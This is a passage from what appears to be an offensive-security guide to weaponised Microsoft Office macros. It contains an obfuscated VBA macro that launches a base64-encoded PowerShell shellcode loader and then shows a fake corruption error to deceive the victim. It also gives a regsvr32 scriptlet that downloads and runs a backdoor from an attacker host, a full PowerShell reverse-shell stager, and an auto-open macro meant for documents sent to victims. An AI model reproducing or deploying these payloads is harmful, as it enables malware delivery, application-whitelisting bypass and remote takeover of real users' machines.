    & "AzACwAMAB4AGUAZgAsADAAeAA3AGEALAAwAHgAMwA4ACwAMAB4ADYAMgAsADAAeAA2ADUALAAwAHgANwBiACwAMAB4ADUAMAAsADAAeABkADIALAAwAHgAZABkACwAMAB4ADIAOAAsADAAeAA0ADUALAAwAHgAMQBkACwAMAB4AGMAOAAsADAAeAA1AGMALAAwAHgAZAA2ACwAMAB4ADgAOAAsADAA'+'eABmADMALAAwAHgAMwA0ACwAMAB4ADgAYgAsADAAeAAxAGIALAAwAHgAOQBjACwAMAB4AGIAYQAsADAAeABmADIALAAwAHgANgBjACwAMAB4ADAAMwAsADAAeAA0ADQALAAwAHgAZAAxACwAMAB4ADYAYwA" _
    & "sADAAeAA3AGYALAAwAHgAOQAzACwAMAB4ADEAZgAsADAAeAAxAGIALAAwAHgAOQAxACwAMAB4ADIANwA7ACQAZwAgAD0AIAAwAHgAMQAwADAAMAA7AGkAZgAgACgAJAB6AC4ATABlAG4AZwB0AGgAIAAtAGcAdAAgADAAeAAxADAAMAAwACk'+'AewAkAGcAIAA9ACAAJAB6AC4ATABlAG4AZwB0AGgAfQA7ACQAUwBUAGsAPQAkAHcAOgA6AFYAaQByAHQAdQBhAGwAQQBsAGwAbwBjACgAMAAsADAAeAAxADAAMAAwACwAJABnACwAMAB4ADQAMAApADsAZgBvAHIAIAAoACQAaQA9ADAAOwAkAGkAIAAtAGwAZQAg" _
    & "ACgAJAB6AC4ATABlAG4AZwB0AGgALQAxACkAOwAkAGkAKwArACkAIAB7ACQAdwA6ADoAbQBlAG0AcwBlAHQAKABbAEkAbgB0AFAAdAByAF0AKAAkAFMAVABrAC4AVABvAEkAbgB0AD'+'MAMgAoACkAKwAkAGkAKQAsACAAJAB6AFsAJABpAF0ALAAgADEAKQB9ADsAJAB3ADoAOgBDAHIAZQBhAHQAZQBUAGgAcgBlAGEAZAAoADAALAAwACwAJABTAFQAawAsADAALAAwACwAMAApADsAZgBvAHIAIAAoADsAOwApAHsAUwB0AGEAcgB0AC0AcwBsAGUAZQBwACAANgAwAH0AOwAnADsAJABlACAAPQAgAFsAUwB5A" _
    & "HMAdABlAG0ALgBDAG8AbgB2AGUAcgB0AF0AOgA6AFQAbwBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoAFsAUwB5AHMAdABlA'+'G0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAbgBpAGMAbwBkAGUALgBHAGUAdABCAHkAdABlAHMAKAAkAEMASAB4ACkAKQA7ACQATABtAE8AIAA9ACAAIgAtAGUAYwAgACIAOwBpAGYAKABbAEkAbgB0AFAAdAByAF0AOgA6AFMAaQB6AGUAIAAtAGUAcQAgADgAKQB7ACQATwBiAEUAdgAgAD0AIAAkAGUAbgB2ADoAUwB5AHMAdABlAG0AUgBvAG8AdAAgAC" _
    & "sAIAAiAFwAcwB5AHMAdwBvAHcANgA0AFwAVwBpAG4AZABvAHcAcwBQ'+'AG8AdwBlAHIAUwBoAGUAbABsAFwAdgAxAC4AMABcAHAAbwB3AGUAcgBzAGgAZQBsAGwAIgA7AGkAZQB4ACAAIgAmACAAJABPAGIARQB2ACAAJABMAG0ATwAgACQAZQAiAH0AZQBsAHMAZQB7ADsAaQBlAHgAIAAiACYAIABwAG8AdwBlAHIAcwBoAGUAbABsACAAJABMAG0ATwAgACQAZQAiADsAfQA=')"""
    Dim EUrxrXO
    EUrxrXO = "S" & "h" & "e" & "l" & "l"
    Dim aHiMN
    aHiMN = "W" & "S" & "c" & "r" & "i" & "p" & "t"
    Dim XkOPOzVOswzjeFO
    XkOPOzVOswzjeFO = aHiMN & "." & EUrxrXO
    Dim DxDAIPQizB
    Dim ToHtLtKuKfUGc
    Set DxDAIPQizB = VBA.CreateObject(XkOPOzVOswzjeFO)
    Dim jMkUOSWtofK
    jMkUOSWtofK = "p" & "o" & "w" & "e" & "r" & "s" & "h" & "e" & "l" & "l" & "." & "e" & "x" & "e" & " "
    ToHtLtKuKfUGc = DxDAIPQizB.Run(jMkUOSWtofK & HsQgOKMOa, 0, False)
    Dim title As String
    title = "Microsoft Office Corrupt Application (Compatibility Mode)"
    Dim msg As String
    Dim intResponse As Integer
    msg = "This application appears to be made on an older version of the Microsoft Office product suite. Please have the author save to a newer and supported format. [Error Code: -219]"
    intResponse = MsgBox(msg, 16, title)
    Application.Quit
    End Sub
    ```


    **2. `regsvr32` based method**

    This method works by making built-in Microsoft tool named `regsvr32` that is used for registering and unregistering OLE Controls / ActiveX objects even from remote resources in a form of **scriptlet** files (`.sct`). By leveraging that feature we can supply remotely hosted (on the attacker-controlled web server) malicious _scriptlet_ file that would after being loaded execute arbitrary commands on the victim's machine.

    The biggest advantage of this method is that the `regsvr32` application is by default whitelisted one and therefore can be used for remote code execution within restricted by AppLocker or Software Restriction Policies (SRPs) environment. In other words, if the victim user is disallowed from running untrusted applications, the `regsvr32` will be the one to go for in order to bypass application whitelisting.

    (This technique could be further automated using `exploit/windows/misc/regsvr32_applocker_bypass_server` module in _Metasploit_).

    As an example of such scriptlets we can use one of the [Casey Smith's payloads](https://gist.github.com/subTee/24c7d8e1ff0f5602092f58cbb3f7d302):

    **File: `bandit.sct`**
    ```
    <?XML version="1.0"?>
    <scriptlet>
    <registration progid="PqYOEI6w" classid="{057b64c8-1107-cda1-3d34-062978395f62}">
    <script>
    <![CDATA[
    var r = new ActiveXObject("WScript.Shell").Run("powershell.exe -nop -w hidden -c $r=new-object net.webclient;$r.proxy=[Net.WebRequest]::GetSystemWebProxy();$r.Proxy.Credentials=[Net.CredentialCache]::DefaultCredentials;IEX $r.downloadstring('http://192.168.56.101/backdoor');", 0);
    ]]>
    </script>
    </registration>
    </scriptlet>
    ```

    Then one will have to serve a `backdoor` file on the Web server that would connect back to the listener, for instance CMD Powershell reverse tcp:

    ```
    powershell.exe -nop -w hidden -c 'if([IntPtr]::Size -eq 4){$b=''powershell.exe''}else{$b=$env:windir+''\syswow64\WindowsPowerShell\v1.0\powershell.exe''};$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments=''-nop -w hidden -c $s=New-Object IO.MemoryStream(,[Convert]::FromBase64String(''''H4sIAI7tmlkCA7VWbW+jOBD+3JX2P6BVJEBK89bsZltppYMkNLShTUpD3i46uWDAiYNTY5qXvf3vNySwTbXtqbfSoVaxmRl7/DzPjPGTyBWERdLaIWjUkL5//HDSQxwtJaWwxb4bbr8WpQJqW3iNqurJCZgLNODY0aRvkjLVVqsWWyISzS4umgnnOBKHeekSCy2O8fKBEhwrqvS3NAwxx6e3D3PsCum7VPirdEnZA6KZ27aJ3BBLp1rkpbYuc1GaWMleUSIU+c8/ZXV6Wp2V2o8JorEi29tY4GXJo1RWpR9quuH9doUV2SIuZzHzRWlIorNaaRDFyMc3sNoTtrAImRfLKpwD/jgWCY+k7ETpEgcHRYZhjzNX8zyOY/AvmdETW2ClECWUFqU/lGm2/10SCbLEYBeYs5WN+RNxcVzqoMij+A77M+UGr/NjvzdIOQ4Cr57gahEoeTVRi3kJxYdYWf011ZxIFZ4jMgGDHx8/fPzg5xLw1zFvfW6Mj0UAo5PpfowhVaXHYrL3/SZVipIFWyLB+BamhXueYHUmTVMSprOZVBC3V8W3w6u5L3hG17WzcRg61XMwTB1GvBkEZhwVWCNatHjlbmim1rcV18I+iXBrG6ElcXNRKa+hj32K90cu5W43kKAiZwbstTDFARIpmkVp+mtYe0nEz1g9IdTDXHOBwRiyAnLVl8kcCFJkM7LwEuA6zGXgwgcp49w7k+823z2dg5PcpCiOi1IvgVpyi5KNEcVeUdKimGQmLRFsP5Sf07USKoiLYpEvN1Nfopnt2mRRLHjiAo+AwL29wi5BNAWkKHWIh/WtTYJ8d/lVOJqIUhIFsNIT0AFvUhhskaqDQ6KpEtSSjYW5XFG8BJd9ZRsUBVDHWS3s1YQC7Mmvp5nr/SDuFJYcj6MkgWubMlGUHMIFtIkU4mdx/VYmR13iKKcmxxlBSl5GU30rUuEXFg3v646kWs2Q2uPCBWBicLbUUYy/1G3BATHlU/mWNDV4xmZELVdfkKq2JlXTgv8BOTNZq+FdX807Zd7ahL5mxqbV6bX6nU796cp26sJum+K6ZwqrPZrPba1zNxiLial17kllMa7vVldkZ3c1b7wpf9npu3VF3+zmgeePW74fNHz7rvrZIN1hs69Xaqjbaifdob7WK/W4TdadPhn0F1eGeBg7FA38cjCqniOy6fK5U2XWztS0y/DM3V35zmVoedtxp3w+rC+0tqY1o7Zj6Ox6rHOtV3ZQ4LD1dVCfDIOmphsuwZP+wND7fUPXBpfzx9Z5OYDYEQr1oVMjk9XoLoS5ASlY5Urd9PCGfe0OifOUrqU/6sZkhLTuZGuUy9VxXEMLnWk6gGhMHiGn8croUYi/H9SY5tCbZ99+p3XtTqqN2Pr2KeUWyC2sa7iCwstR0D4/ouytBm0hHoeIApXQd/PCMhg3sh7aYySNUJTsOl1gHmEKlxBcU7koNUqZm3bzn/0WbpNDj59BeQ1geFZ7daRKPx3V5z6fv7q4mECuIPKDAEtdHAUiLFY2Z5UKNOvKpl6BQ7//hE222irZYsW03R9j9bwN3W+jpiVQWN4xe7T06sMq/r/BzCowhB/vPWA+v/sX67sArhRfAPGL9eWL/wT5b+AwRESArw3dhOLDPfc2HJmMjr4RjhgDpfjZk36u3Sbi9Aa+IP4BA1mEpCIKAAA=''''));IEX (New-Object IO.StreamReader(New-Object IO.Compression.GzipStream($s,[IO.Compression.CompressionMode]::Decompress))).ReadToEnd();'';$s.UseShellExecute=$false;$s.RedirectStandardOutput=$true;$s.WindowStyle=''Hidden'';$s.CreateNoWindow=$true;$p=[System.Diagnostics.Process]::Start($s);'
    ```


    The above file has to be stored on the remotely accessible web server and named for instance **bandit.sct**. Then, we can use the following macro embedded in Office file that will be sent to the victim for opening:

    **Macro/Script to be used in Malicious Document**:
    ```
    Private Sub Document_Open()
    Test
    End Sub
    Private Sub DocumentOpen()
    Test
    End Sub
    Private Sub Auto_Open()
    Test
    End Sub
    Private Sub AutoOpen()
    Test
    End Sub
    Private Sub Auto_Exec()
    Test
    End Sub
    Private Sub Test()
    Dim shell
    Dim out
    Set shell = VBA.CreateObject("WScript.Shell")
    out = shell.Run("regsvr32 /u /n /s /i:http://192.168.56.101/bandit.sct scrobj.dll", 0, False)
    End Sub
    ```

    So the entire attack goes as follows:

    Malicious document with `Run("regsvr32 [...] /i:http://[...]/file.sct")` -> `file.sct` delivers Powershell Download & Exec command (`backdoor`) -> `backdoor` Powershell CMD reverse tcp 2nd stage gets delivered and executed